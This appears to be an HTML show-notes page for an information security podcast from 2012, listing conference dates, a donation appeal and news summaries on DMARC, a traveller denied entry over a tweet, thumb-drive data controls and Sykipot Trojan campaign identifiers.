	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.cnet.com/8301-27080_3-57367842-245/antiphishing-standard-in-the-works-from-google-facebook-others/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-27080_3-57367842-245/antiphishing-standard-in-the-works-from-google-facebook-others/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google, Facebook, Microsoft, Yahoo, PayPal and others are working together on a standard that can be used across the Internet for blocking phishing e-mails.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 15 companies will be announcing on Monday DMARC.org, which stands for Domain-based Message Authentication, Reporting, and Conformance&#8211;a system for verifying that e-mails are coming from legitimate companies and not imposters trying to trick people into clicking a phishing link. Basically, the system offers a common way for companies to authenticate their legitimate communications with customers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also in the DMARC working group are AOL, Bank of America, Fidelity Investments, American Greetings, LinkedIn, and e-mail security providers Agari, Cloudmark, eCert, Return Path, and Trusted Domain Project.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tgdaily.com/software-brief/61138-man-denied-entry-to-us-because-of-a-tweet"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tgdaily.com/software-brief/61138-man-denied-entry-to-us-because-of-a-tweet</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently the Department of Homeland Security has nothing better to do than to monitor what vacationing tourists post on Twitter.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A 26-year-old bar manager by the name of Leigh Van Bryan, an Irish citizen, decided to take a trip to Los Angeles. Before he left, he wrote this message on Twitter:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Free this week, for quick gossip/prep before I go and destroy America.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Then, to his surprise, when he arrived at LAX he was treated like a criminal, interrogated by government officials, and then forced to return back to his home.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">News reports compared the Twitter message to passengers who joke about having a bomb at the airport and are then escorted off the premises. But obviously, Bryan&#39;s message was not even a joke about violent activity.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone with a normal sense of the English language would realize the context implied he was going to &quot;tear it up&quot; or go wild, you know, have a good time. For anyone to even think that was any sort of potential threat is ridiculous.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In another tweet, Bryan apparently wrote that while in LA he would be &quot;diggin&#39; Marilyn Monroe up,&quot; a reference to an episode of Family Guy.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.networkworld.com/research/2012/012712-how-to-prevent-thumb-drive-255414.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/research/2012/012712-how-to-prevent-thumb-drive-255414.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For such a small device, the plastic, handheld USB flash drive can cause big security headaches. Even if you have robust end-point security and establish rigid policies about employee use of these drives, employees still find a way to copy financial reports and business plans for use at home. While other security breaches are more traceable, a flash drive is more difficult to monitor, especially after the employee leaves work.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here we profile four organizations that have taken slightly different approaches to dealing with thumb-drive security to match the organizations&#39; specific needs and policies.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. City of ColumbusApproach: Uses Intelligent ID software to categorize files, and then assign a level of encryption on the fly.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. TurkcellApproach: Uses classification software from Titus that monitors Microsoft Office business documents and alerts users when they try to copy that data to a thumb drive.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. CIGNAApproach: Allows employees to copy encrypted data, but they are prompted to type in a reason why they&#39;re copying. The reasons are later compared to the actual file transfers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. University of Alabama, Birmingham Health SystemApproach: Uses DeviceLock to monitor ports and encrypt data. Allows staff and students to use thumb drives at will, but all file transfers are monitored and recorded.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.symantec.com/connect/blogs/insight-sykipot-operations-0"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/connect/blogs/insight-sykipot-operations-0</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Sykipot campaign has been persistent in the past few months targeting various industries, the majority of which belong to the defense industry. Each campaign is marked with a unique identifier comprised of a few letters followed by a date hard-coded within the Sykipot Trojan itself. In some cases the keyword preceding the numbers is the sub-domain&#39;s folder name on the Web server being used. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here are some examples of the campaigns we have seen so far:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">alt20111215</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">auto20110413</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">auto20110420</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">be20111010</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">chk20111219</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">chksrv20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">easy20110720w</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">easy20110926n</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">good20110627</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">help20110908</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">help20110926</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">info20111025</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">info20111028</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">info20111031G</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">insight20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pretty20111101</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pretty20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pub2011124x</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">server20111212</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">webmail20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">world20111205</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These campaign markers allow the attackers to correlate different attacks on different organizations and industries.</span><br />
	&nbsp;</p>
